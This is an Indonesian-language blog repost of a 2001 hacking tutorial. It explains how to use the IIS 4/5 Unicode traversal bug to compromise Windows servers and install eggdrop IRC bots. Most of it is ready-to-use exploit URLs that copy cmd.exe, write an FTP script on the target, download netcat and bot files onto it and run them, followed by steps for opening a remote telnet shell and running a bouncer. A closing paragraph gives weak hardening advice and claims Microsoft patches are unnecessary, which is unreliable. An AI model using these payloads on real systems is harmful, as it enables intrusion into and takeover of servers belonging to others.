Posted by: safarah | 62007000UTC11bUTCSat, 24 Nov 2007 18:38:06 +0000 24, 2007

buat bot eggdrop pake unicodet

Pembuatan bot eggdrop mengunakan UNICODE
Date: Thursday, November 22, 2001 Hits: 7310 By: Acong
saya ingin berbagi ilmu sedikit tentang caranya membuat bot melalui bugs iis4 ato 5, yaitu unicode. caranya gampang yang di perlukan adalah.

– cara upload mengunakan ftp (75% kemungkinan berhasil)
a. echo untuk menulis 1 file ke sana berupa *.txt
b. jalanin ftp -s:filename

– eggdrop windows versi apa aja
a. file yang perlu di upload 5 file yang simple.
eggdrop.exe, 2 file *.dll dan 2 file buat *.tcl
b. cara pembuatan *.bat untuk menjalaninnya.

– cara melakukan telnet ke NT
a. cari file yang bernamakan nc99xx.exe
b. masukan file tersebut ke server.
c. jalankan di server
d. di saat jalan di server. cepat jalan di pc anda “TELNET targetip/host 99”

– cara menjalankan BNC di server.
a. upload file bnc.exe dan bnc.cfg
b. jalankan di server.
c. connect ke sana deh.. (gampang kan) cuman sayang psybnc di winnt ataupun windows 2k tidak dapat menjalankan psybnc buat windows ( sebab program akan crash dan memberikan error “connot load to muach memory need” semacam itu)

ok saya start dari upload dari ftp. ada perlu memiliki 1 ftp server yang berada di server
lain. ataupun anda menjalankan ftp server ftp server aku:
127.0.0.1
username = acong
password = juny
setelah itu.

1:mencopy file cmd.exe ke folder c:\
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\bagan.exe

2:membuka ftp connection
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+open
127.0.0.1+>+c:\bagan.txt

3:masukan username
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+acong+>>+c:\bagan.txt

4:masukan password
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+juny+>>+c:\bagan.txt

5:kurang jelas dalam ini coba pelajarin ftp dalam dos
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+user
acong juny+>>+c:\bagan.txt

6:type binary untuk mendapatkan file berupa binary
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+type
binary+>>+c:\bagan.txt

7: get file file eggdrop dan nc99xx.exe
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+get
filename c:\filename+>>+c:\bagan.txt

8:jangan lupa di bye/quit
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+echo+bye+>>+c:\bagan.txt

9:jalanakn cara ftp -s:filenama
http://target/scripts/..%c1%9c../..%c1%9c../..%c1%9c../bagan.exe?/c+ftp
-s:c:\bagan.txt

setalah itu tunggulah sampai browser and keluar kata done di bawah.
nah kalo sudah selesai saya jamin 75% kemungkian file anda telah di masukan ke sana.

————————————
cara menjalankan telnet ke sana. dan mengetahui apakah server itu memiliki multiple ip. 202.188.34.*
setelah mendapatkan file nc99xx.exe, cepatlah jalankan ke server. di saat telah jalan dan kelihatan servernya lagi berinteraksi sama file tersebut, anda cepatlah
melakukan telnet ke server tersebut. dengan cara ke “TELNET target 99”
nah setelah mendapatkan root telnet. gunakan command ini “ipconfig”. ini akan menunjukan ip yang berada di server itu. nah bagi yang mengerti tentang eggdrop, tcl anda akan di isi dengan ip ip di sana.

kalo anda kurang mengerti di bagian apa aja dalam artikel yang saya tulis ini. (sorry saya tidak mau membahasnya)

—————————————————–
di luar dari artikel ini.
CARA MEMJALANKAN IIS4 atau 5 secara aman.
cobalah anda melihat di seting iis anda.
atau carilah folder folder (scripts, _vti_bin, msadc,
iisadmp..,admin..) file file yang mengandung shere di
internet. perlulah ada perhatikan sheringnya dan
fungsi folder itu.
kalo bisa di property itu dari script and executable.
di ganti ke script only ataupun none.
itu saja, gampang kan mudah lagi.
di jamin tidak perlu memjalankan patch patch yang di
berikan dari microsoft.
(kalo anda kurang mengerti tentang ini. sialakan email
aku)

cukup sini saja.


Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

%d bloggers like this: